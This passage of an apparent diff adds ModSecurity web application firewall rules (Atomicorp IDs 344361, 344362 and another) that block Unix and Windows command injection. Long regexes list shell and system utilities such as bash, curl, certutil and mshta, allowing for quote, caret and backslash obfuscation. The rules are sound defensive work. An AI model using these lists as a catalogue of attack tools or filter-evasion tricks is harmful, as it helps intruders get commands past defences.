{]*)?\x5c?b)|j[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:j[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?s|q)|k[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?h|l[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:(?:d[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:d[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?)?|(?:[np]|u[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?a)[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?)[\s\v<>].*|s)|m[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:(?:a[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?n|v)[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v<>].*|t[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?r)|p[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:(?:(?:a[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?x|f|h[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?p)[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?|r[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:y[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?)?)[\s\v<>].*|d[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?b|(?:k[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?)?g|i[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:c|p[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:[<>]|(?:[\--\.0-9A-Z_a-z][\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?)+[\s\v<>]).*)|s|t[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?x)|r[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:(?:a[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?r|c[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?p|(?:p[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?)?m)[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v<>].*|e[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:d[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v<>].*|v))|s[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?p|(?:(?:e[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?[dt]|u)[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?|s[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?)?)[\s\v<>].*|[g-h]|v[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?n)|t[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:c|r[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v<>].*)|b[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?l|e[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?[ex]|i[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v<>].*|o[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?p)|w[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:3[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?m|c|h[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?o)|x[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:x[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?d|z[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v<>].*)|y[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?m|z[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:i[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?p|s[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?h))\b" "id:344361,rev:2,phase:2,deny,status:403,capture,t:none,severity:2,msg:'Atomicorp.com WAF Rules: Remote Command Execution: Unix Command Injection (2-3 chars)',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',ctl:auditLogParts=+E,auditlog,log"
+
+
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:t[\"\^]*i[\"\^]*m[\"\^]*e|[\n\r;`\{]|\|\|?|&&?)[\s\v]*[\s\v\"'-\(,@]*(?:[\"'\.-9A-Z_a-z]+/|(?:[\"'\x5c\^]*[0-9A-Z_a-z][\"'\x5c\^]*:.*|[ \"'\.-9A-Z\x5c\^-_a-z]*)\x5c)?[\"\^]*(?:a[\"\^]*(?:c[\"\^]*c[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*c[\"\^]*k[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*s[\"\^]*o[\"\^]*l[\"\^]*e|d[\"\^]*(?:p[\"\^]*l[\"\^]*u[\"\^]*s|v[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k)|(?:g[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*c[\"\^]*u[\"\^]*t[\"\^]*o|s[\"\^]*p[\"\^]*n[\"\^]*e[\"\^]*t[\"\^]*_[\"\^]*c[\"\^]*o[\"\^]*m[\"\^]*p[\"\^]*i[\"\^]*l[\"\^]*e)[\"\^]*r|p[\"\^]*p[\"\^]*(?:i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*l[\"\^]*l[\"\^]*e[\"\^]*r|v[\"\^]*l[\"\^]*p)|t[\"\^]*(?:[\s\v,\.-/;-<>].*|b[\"\^]*r[\"\^]*o[\"\^]*k[\"\^]*e[\"\^]*r))|b[\"\^]*(?:a[\"\^]*s[\"\^]*h|g[\"\^]*i[\"\^]*n[\"\^]*f[\"\^]*o|i[\"\^]*t[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|c[\"\^]*(?:d[\"\^]*b|e[\"\^]*r[\"\^]*t[\"\^]*(?:o[\"\^]*c|r[\"\^]*e[\"\^]*q|u[\"\^]*t[\"\^]*i[\"\^]*l)|l[\"\^]*_[\"\^]*(?:i[\"\^]*n[\"\^]*v[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n|l[\"\^]*o[\"\^]*a[\"\^]*d[\"\^]*a[\"\^]*s[\"\^]*s[\"\^]*e[\"\^]*m[\"\^]*b[\"\^]*l[\"\^]*y|m[\"\^]*u[\"\^]*t[\"\^]*e[\"\^]*x[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*i[\"\^]*f[\"\^]*i[\"\^]*e[\"\^]*r[\"\^]*s)|m[\"\^]*(?:d(?:[\"\^]*(?:k[\"\^]*e[\"\^]*y|l[\"\^]*3[\"\^]*2))?|s[\"\^]*t[\"\^]*p)|o[\"\^]*(?:m[\"\^]*s[\"\^]*v[\"\^]*c[\"\^]*s|n[\"\^]*(?:f[\"\^]*i[\"\^]*g[\"\^]*s[\"\^]*e[\"\^]*c[\"\^]*u[\"\^]*r[\"\^]*i[\"\^]*t[\"\^]*y[\"\^]*p[\"\^]*o[\"\^]*l[\"\^]*i[\"\^]*c[\"\^]*y|h[\"\^]*o[\"\^]*s[\"\^]*t|t[\"\^]*r[\"\^]*o[\"\^]*l)|r[\"\^]*e[\"\^]*g[\"\^]*e[\"\^]*n)|r[\"\^]*e[\"\^]*a[\"\^]*t[\"\^]*e[\"\^]*d[\"\^]*u[\"\^]*m[\"\^]*p|s[\"\^]*(?:c(?:[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)?|i)|u[\"\^]*s[\"\^]*t[\"\^]*o[\"\^]*m[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l[\"\^]*h[\"\^]*o[\"\^]*s[\"\^]*t)|d[\"\^]*(?:a[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*v[\"\^]*c[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|e[\"\^]*(?:f[\"\^]*a[\"\^]*u[\"\^]*l[\"\^]*t[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k|s[\"\^]*k(?:[\"\^]*t[\"\^]*o[\"\^]*p[\"\^]*i[\"\^]*m[\"\^]*g[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n[\"\^]*l[\"\^]*d[\"\^]*r)?|v[\"\^]*(?:i[\"\^]*c[\"\^]*e[\"\^]*c[\"\^]*r[\"\^]*e[\"\^]*d[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*i[\"\^]*a[\"\^]*l[\"\^]*d[\"\^]*e[\"\^]*p[\"\^]*l[\"\^]*o[\"\^]*y[\"\^]*m[\"\^]*e[\"\^]*n[\"\^]*t|t[\"\^]*o[\"\^]*o[\"\^]*l[\"\^]*s[\"\^]*l[\"\^]*a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*r))|f[\"\^]*s[\"\^]*(?:h[\"\^]*i[\"\^]*m|v[\"\^]*c)|i[\"\^]*(?:a[\"\^]*n[\"\^]*t[\"\^]*z|s[\"\^]*k[\"\^]*s[\"\^]*h[\"\^]*a[\"\^]*d[\"\^]*o[\"\^]*w)|n[\"\^]*(?:s[\"\^]*c[\"\^]*m[\"\^]*d|x)|o[\"\^]*t[\"\^]*n[\"\^]*e[\"\^]*t|u[\"\^]*m[\"\^]*p[\"\^]*6[\"\^]*4|x[\"\^]*c[\"\^]*a[\"\^]*p)|e[\"\^]*(?:s[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*u[\"\^]*t[\"\^]*l|v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*v[\"\^]*w[\"\^]*r|x[\"\^]*(?:c[\"\^]*e[\"\^]*l|p[\"\^]*(?:a[\"\^]*n[\"\^]*d|l[\"\^]*o[\"\^]*r[\"\^]*e[\"\^]*r)|t[\"\^]*(?:e[\"\^]*x[\"\^]*p[\"\^]*o[\"\^]*r[\"\^]*t|r[\"\^]*a[\"\^]*c[\"\^]*3[\"\^]*2)))|f[\"\^]*(?:i[\"\^]*n[\"\^]*(?:d[\"\^]*s[\"\^]*t|g[\"\^]*e)[\"\^]*r|l[\"\^]*t[\"\^]*m[\"\^]*c|o[\"\^]*r[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s|s[\"\^]*(?:i(?:[\"\^]*a[\"\^]*n[\"\^]*y[\"\^]*c[\"\^]*p[\"\^]*u)?|u[\"\^]*t[\"\^]*i[\"\^]*l)|t[\"\^]*p)|g[\"\^]*(?:f[\"\^]*x[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n[\"\^]*l[\"\^]*o[\"\^]*a[\"\^]*d[\"\^]*w[\"\^]*r[\"\^]*a[\"\^]*p[\"\^]*p[\"\^]*e[\"\^]*r|p[\"\^]*s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)|h[\"\^]*h|i[\"\^]*(?:e[\"\^]*(?:4[\"\^]*u[\"\^]*i[\"\^]*n[\"\^]*i[\"\^]*t|a[\"\^]*d[\"\^]*v[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k|e[\"\^]*x[\"\^]*e[\"\^]*c|f[\"\^]*r[\"\^]*a[\"\^]*m[\"\^]*e)|l[\"\^]*a[\"\^]*s[\"\^]*m|m[\"\^]*e[\"\^]*w[\"\^]*d[\"\^]*b[\"\^]*l[\"\^]*d|n[\"\^]*(?:f[\"\^]*d[\"\^]*e[\"\^]*f[\"\^]*a[\"\^]*u[\"\^]*l[\"\^]*t[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*l|s[\"\^]*t[\"\^]*a[\"\^]*l[\"\^]*l[\"\^]*u[\"\^]*t[\"\^]*i)[\"\^]*l)|j[\"\^]*s[\"\^]*c|l[\"\^]*(?:a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*-[\"\^]*v[\"\^]*s[\"\^]*d[\"\^]*e[\"\^]*v[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l|d[\"\^]*i[\"\^]*f[\"\^]*d[\"\^]*e)|m[\"\^]*(?:a[\"\^]*(?:k[\"\^]*e[\"\^]*c[\"\^]*a[\"\^]*b|n[\"\^]*a[\"\^]*g[\"\^]*e[\"\^]*-[\"\^]*b[\"\^]*d[\"\^]*e|v[\"\^]*i[\"\^]*n[\"\^]*j[\"\^]*e[\"\^]*c[\"\^]*t)|f[\"\^]*t[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*e|i[\"\^]*c[\"\^]*r[\"\^]*o[\"\^]*s[\"\^]*o[\"\^]*f[\"\^]*t|m[\"\^]*c|p[\"\^]*c[\"\^]*m[\"\^]*d[\"\^]*r[\"\^]*u[\"\^]*n|s[\"\^]*(?:(?:b[\"\^]*u[\"\^]*i[\"\^]*l|o[\"\^]*h[\"\^]*t[\"\^]*m[\"\^]*e)[\"\^]*d|c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|d[\"\^]*(?:e[\"\^]*p[\"\^]*l[\"\^]*o[\"\^]*y|t)|h[\"\^]*t[\"\^]*(?:a|m[\"\^]*l)|i[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*c|p[\"\^]*u[\"\^]*b|x[\"\^]*s[\"\^]*l))|n[\"\^]*(?:e[\"\^]*t[\"\^]*s[\"\^]*h|t[\"\^]*d[\"\^]*s[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l)|o[\"\^]*(?:d[\"\^]*b[\"\^]*c[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*f|f[\"\^]*f[\"\^]*l[\"\^]*i[\"\^]*n[\"\^]*e[\"\^]*s[\"\^]*c[\"\^]*a[\"\^]*n[\"\^]*n[\"\^]*e[\"\^]*r[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l|n[\"\^]*e[\"\^]*d[\"\^]*r[\"\^]*i[\"\^]*v[\"\^]*e[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*n[\"\^]*d[\"\^]*a[\"\^]*l[\"\^]*o[\"\^]*n[\"\^]*e[\"\^]*u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e[\"\^]*r|p[\"\^]*e[\"\^]*n[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*s[\"\^]*o[\"\^]*l[\"\^]*e)|p[\"\^]*(?:c[\"\^]*(?:a[\"\^]*l[\"\^]*u[\"\^]*a|w[\"\^]*(?:r[\"\^]*u[\"\^]*n|u[\"\^]*t[\"\^]*l))|(?:e[\"\^]*s[\"\^]*t[\"\^]*e|s)[\"\^]*r|(?:k[\"\^]*t[\"\^]*m[\"\^]*o|u[\"\^]*b[\"\^]*p[\"\^]*r)[\"\^]*n|n[\"\^]*p[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|o[\"\^]*w[\"\^]*e[\"\^]*r[\"\^]*p[\"\^]*n[\"\^]*t|r[\"\^]*(?:e[\"\^]*s[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*a[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*h[\"\^]*o[\"\^]*s[\"\^]*t|i[\"\^]*n[\"\^]*t(?:[\"\^]*b[\"\^]*r[\"\^]*m)?|o[\"\^]*(?:c[\"\^]*d[\"\^]*u[\"\^]*m[\"\^]*p|t[\"\^]*o[\"\^]*c[\"\^]*o[\"\^]*l[\"\^]*h[\"\^]*a[\"\^]*n[\"\^]*d[\"\^]*l[\"\^]*e[\"\^]*r)))|r[\"\^]*(?:a[\"\^]*s[\"\^]*a[\"\^]*u[\"\^]*t[\"\^]*o[\"\^]*u|c[\"\^]*s[\"\^]*i|(?:d[\"\^]*r[\"\^]*l[\"\^]*e[\"\^]*a[\"\^]*k[\"\^]*d[\"\^]*i[\"\^]*a|p[\"\^]*c[\"\^]*p[\"\^]*i[\"\^]*n)[\"\^]*g|e[\"\^]*(?:g(?:[\"\^]*(?:a[\"\^]*s[\"\^]*m|e[\"\^]*d[\"\^]*i[\"\^]*t|i[\"\^]*(?:n[\"\^]*i|s[\"\^]*t[\"\^]*e[\"\^]*r[\"\^]*-[\"\^]*c[\"\^]*i[\"\^]*m[\"\^]*p[\"\^]*r[\"\^]*o[\"\^]*v[\"\^]*i[\"\^]*d[\"\^]*e[\"\^]*r)|s[\"\^]*v[\"\^]*(?:c[\"\^]*s|r[\"\^]*3[\"\^]*2)))?|(?:m[\"\^]*o[\"\^]*t|p[\"\^]*l[\"\^]*a[\"\^]*c)[\"\^]*e)|u[\"\^]*n[\"\^]*(?:d[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2|(?:e[\"\^]*x[\"\^]*e|s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*p[\"\^]*e[\"\^]*r|o[\"\^]*n[\"\^]*c[\"\^]*e))|s[\"\^]*(?:c[\"\^]*(?:[\s\v,\.-/;-<>].*|h[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*k[\"\^]*s|r[\"\^]*i[\"\^]*p[\"\^]*t[\"\^]*r[\"\^]*u[\"\^]*n[\"\^]*n[\"\^]*e[\"\^]*r)|e[\"\^]*t[\"\^]*(?:r[\"\^]*e[\"\^]*s|t[\"\^]*i[\"\^]*n[\"\^]*g[\"\^]*s[\"\^]*y[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*o[\"\^]*s[\"\^]*t|u[\"\^]*p[\"\^]*a[\"\^]*p[\"\^]*i)|h[\"\^]*(?:d[\"\^]*o[\"\^]*c[\"\^]*v[\"\^]*w|e[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2)|q[\"\^]*(?:l[\"\^]*(?:d[\"\^]*u[\"\^]*m[\"\^]*p[\"\^]*e[\"\^]*r|(?:t[\"\^]*o[\"\^]*o[\"\^]*l[\"\^]*s[\"\^]*)?p[\"\^]*s)|u[\"\^]*i[\"\^]*r[\"\^]*r[\"\^]*e[\"\^]*l)|s[\"\^]*h|t[\"\^]*o[\"\^]*r[\"\^]*d[\"\^]*i[\"\^]*a[\"\^]*g|y[\"\^]*(?:n[\"\^]*c[\"\^]*a[\"\^]*p[\"\^]*p[\"\^]*v[\"\^]*p[\"\^]*u[\"\^]*b[\"\^]*l[\"\^]*i[\"\^]*s[\"\^]*h[\"\^]*i[\"\^]*n[\"\^]*g[\"\^]*s[\"\^]*e[\"\^]*r[\"\^]*v[\"\^]*e[\"\^]*r|s[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*u[\"\^]*p))|t[\"\^]*(?:e[\"\^]*[\s\v,\.-/;-<>].*|r[\"\^]*a[\"\^]*c[\"\^]*k[\"\^]*e[\"\^]*r|t[\"\^]*(?:d[\"\^]*i[\"\^]*n[\"\^]*j[\"\^]*e[\"\^]*c[\"\^]*t|t[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*e[\"\^]*r))|u[\"\^]*(?:n[\"\^]*r[\"\^]*e[\"\^]*g[\"\^]*m[\"\^]*p[\"\^]*2|p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e|r[\"\^]*l|t[\"\^]*i[\"\^]*l[\"\^]*i[\"\^]*t[\"\^]*y[\"\^]*f[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*s)|v[\"\^]*(?:b[\"\^]*c|e[\"\^]*r[\"\^]*c[\"\^]*l[\"\^]*s[\"\^]*i[\"\^]*d|i[\"\^]*s[\"\^]*u[\"\^]*a[\"\^]*l[\"\^]*u[\"\^]*i[\"\^]*a[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*i[\"\^]*f[\"\^]*y[\"\^]*n[\"\^]*a[\"\^]*t[\"\^]*i[\"\^]*v[\"\^]*e|s[\"\^]*(?:i[\"\^]*i[\"\^]*s[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*l[\"\^]*a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h|j[\"\^]*i[\"\^]*t[\"\^]*d[\"\^]*e[\"\^]*b[\"\^]*u[\"\^]*g[\"\^]*g)[\"\^]*e[\"\^]*r)|w[\"\^]*(?:a[\"\^]*b|(?:f|m[\"\^]*i)[\"\^]*c|i[\"\^]*n[\"\^]*(?:g[\"\^]*e[\"\^]*t|r[\"\^]*m|w[\"\^]*o[\"\^]*r[\"\^]*d)|l[\"\^]*r[\"\^]*m[\"\^]*d[\"\^]*r|o[\"\^]*r[\"\^]*k[\"\^]*f[\"\^]*o[\"\^]*l[\"\^]*d[\"\^]*e[\"\^]*r[\"\^]*s|s[\"\^]*(?:(?:c[\"\^]*r[\"\^]*i[\"\^]*p|r[\"\^]*e[\"\^]*s[\"\^]*e)[\"\^]*t|l)|t[\"\^]*[\s\v,\.-/;-<>].*|u[\"\^]*a[\"\^]*u[\"\^]*c[\"\^]*l[\"\^]*t)|x[\"\^]*w[\"\^]*i[\"\^]*z[\"\^]*a[\"\^]*r[\"\^]*d|z[\"\^]*i[\"\^]*p[\"\^]*f[\"\^]*l[\"\^]*d[\"\^]*r)(?:\.[\"\^]*[0-9A-Z_a-z]+)?\b" "id:344362,rev:2,phase:2,deny,status:403,capture,t:none,severity:2,msg:'Atomicorp.com WAF Rules: Remote Command Execution: Unix Command Injection (2-3 chars)',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',ctl:auditLogParts=+E,auditlog,log"
+
+
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:l[\\\\'\"]*(?:w[\\\\'\"]*p[\\\\'\"]*-[\\\\'\"]*(?:d[\\\\'\"]*(?:o[\\\\'\"]*w[\\\\'\"]*n[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*a[\\\\'\"]*d|u[\\\\'\"]*m[\\\\'\"]*p)|r[\\\\'\"]*e[\\\\'\"]*q[\\\\'\"]*u[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|m[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*r)|s(?:[\\\\'\"]*(?:b[\\\\'\"]*_[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*s[\\\\'\"]*e|c[\\\\'\"]*p[\\\\'\"]*u|m[\\\\'\"]*o[\\\\'\"]*d|p[\\\\'\"]*c[\\\\'\"]*i|u[\\\\'\"]*s[\\\\'\"]*b|-[\\\\'\"]*F|h[\\\\'\"]*w|o[\\\\'\"]*f))?|z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|m[\\\\'\"]*(?:o[\\\\'\"]*r[\\\\'\"]*e|a)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s)|e[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*(?:(?:f[\\\\'\"]*i[\\\\'\"]*l|p[\\\\'\"]*i[\\\\'\"]*p)[\\\\'\"]*e|e[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*o|(?:\s|<|>).*)|a[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*(?:l[\\\\'\"]*o[\\\\'\"]*g(?:[\\\\'\"]*i[\\\\'\"]*n)?|c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*m|(?:\s|<|>).*)|o[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*(?:t[\\\\'\"]*e|l)[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e)|d[\\\\'\"]*(?:c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g|d[\\\\'\"]*(?:\s|<|>).*)|f[\\\\'\"]*t[\\\\'\"]*p(?:[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*t)?|(?:[np]|y[\\\\'\"]*n[\\\\'\"]*x)[\\\\'\"]*(?:\s|<|>).*)|b[\\\\'\"]*(?:z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*p[\\\\'\"]*2)|s[\\\\'\"]*d[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*f[\\\\'\"]*f|t[\\\\'\"]*a[\\\\'\"]*r)|a[\\\\'\"]*(?:t[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|s[\\\\'\"]*h)|r[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*k[\\\\'\"]*s[\\\\'\"]*w|u[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*n)|c[\\\\'\"]*(?:o[\\\\'\"]*(?:m[\\\\'\"]*(?:p[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*d)[\\\\'\"]*(?:\s|<|>).*|p[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*c)|h[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*(?:\s|<|>).*|f[\\\\'\"]*l[\\\\'\"]*a[\\\\'\"]*g[\\\\'\"]*s|a[\\\\'\"]*t[\\\\'\"]*t[\\\\'\"]*r|m[\\\\'\"]*o[\\\\'\"]*d)|r[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*b|(?:[cp]|a[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|u[\\\\'\"]*r[\\\\'\"]*l|s[\\\\'\"]*h)|f[\\\\'\"]*(?:i(?:[\\\\'\"]*(?:l[\\\\'\"]*e[\\\\'\"]*(?:t[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|(?:\s|<|>).*)|n[\\\\'\"]*d[\\\\'\"]*(?:\s|<|>).*))?|t[\\\\'\"]*p[\\\\'\"]*(?:s[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*s|w[\\\\'\"]*h[\\\\'\"]*o|(?:\s|<|>).*)|u[\\\\'\"]*n[